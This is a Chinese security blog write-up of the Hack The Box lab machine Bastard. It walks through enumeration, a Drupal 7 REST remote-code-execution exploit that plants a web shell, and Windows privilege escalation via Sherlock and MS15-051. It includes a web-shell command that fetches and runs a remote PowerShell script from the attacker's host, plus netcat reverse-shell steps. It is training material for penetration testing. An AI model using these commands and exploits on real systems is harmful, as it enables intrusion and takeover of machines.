freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

HTB系列之七:Bastard
MS08067安全实验室 2021-03-07 23:05:39 134814
所属地 江苏省

shavchenMs08067安全实验

这次挑战的是 HTB 的第7台靶机:Bastard

1615123750_6044d526bb0e1ac68d747.png!small?1615123749510

技能收获:

  • PHP Unserilaize

  • CMS Version Identify

  • Windows privilege escalation :Sherlock

信息收集

基本信息

Bastard IP:10.10.10.9

Kali IP:10.10.14.23

端口枚举


nmap -A -p- -v -T4 10.10.10.9

1615123770_6044d53adb9dc115535eb.png!small?1615123769524发现开启了80(IIS),访问之

1615123779_6044d5432cfcc207db3b4.png!small?1615123778164

看起来是drupal cms,访问 robots.txt ,发现版本变更文件

1615123789_6044d54d8729c7a80417a.png!small?1615123788311

1615123796_6044d554aeb5384446bea.png!small?1615123795323

版本:Drupal 7.54

漏洞发现

searchsploit drupal 7.x

1615123895_6044d5b7c1defece15945.png!small?1615123894890

该版本存在 rce ,编辑 exploit

1615123912_6044d5c8821398af2a0c4.png!small?1615123911136

该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。

1615123920_6044d5d0d0adc47fa630c.png!small?1615123919368

通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit


gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

1615123952_6044d5f09c07e275e367e.png!small?1615123951349

1615123956_6044d5f4d1226ba4db034.png!small?1615123955547

漏洞利用


php exp.php

1615123970_6044d602d1927bbc9b0d1.png!small?1615123970475

没有反应,挂上 burpsuite 看看

1615123979_6044d60b2a1ba3a127f46.png!small?1615123977706


1615123983_6044d60fd479377550df0.png!small?1615123982540

设置 exp 的target为 burp 的监听端口

1615127489_6044e3c11e0db5147fcc4.png!small?1615127487993

1615127493_6044e3c592777bdda99a5.png!small?1615127492258

依然没回应,那应该是缺少php包,未成功发送

检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php


apt install php-curl

1615127507_6044e3d388592e6892dc3.png!small?1615127506618

1615127512_6044e3d84e039c34e5ce6.png!small?1615127511006利用 session.json 可以伪造会话,成功登录

1615127541_6044e3f53660ae8e48969.png!small?1615127539868

1615127549_6044e3fd0005f97d0efe8.png!small?1615127548289

已知目标是 x64 的系统,我们上传 nc.exe

下载地址:https://eternallybored.org/misc/netcat/

给 exp 添加一个文件上传功能,也可以使用 smb文件共享,使用copy \\ip\nc64.exe nc.exe上传

1615127644_6044e45caeb07843f9221.png!small?1615127643194

1615127650_6044e46278eca890ce7e9.png!small?16151276492891615127660_6044e46ccc2f3ca678989.png!small?1615127659553

权限提升


git clone git clone https://github.com/rasta-mouse/Sherlock.git

Sherlock是一个在Windows下用于本地提权的PowerShell脚本


http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -

1615129277_6044eabd10f7a1c27456c.png!small?1615129275681

提示 ms15-051 , 利用之

提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上传并运行

1615129287_6044eac764be68bd7842f.png!small?1615129286033


建立 nc 会话

1615129300_6044ead41153ebb106970.png!small?1615129298865

至此完成

参考文章

Drupal 7.x RCE 漏洞分析 附EXP:

https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/


<br>

MS08067实验室官网:www.ms08067.com


公众号:" Ms08067安全实验室"


Ms08067安全实验室目前开放知识星球: WEB安全攻防,内网安全攻防,Python安全攻防,KALI Linux安全攻防,二进制逆向入门


最后期待各位小伙伴的加入!




# 渗透测试 # web安全 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 MS08067安全实验室 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
MS08067安全实验室 LV.6
Ms08067安全实验室
  • 77 文章数
  • 79 关注者
跨域攻击分析和防御(中)
2024-04-15
跨域攻击分析和防御(上)
2024-04-03
kerberos-MS14-068(kerberos域用户提权)
2024-04-02
文章目录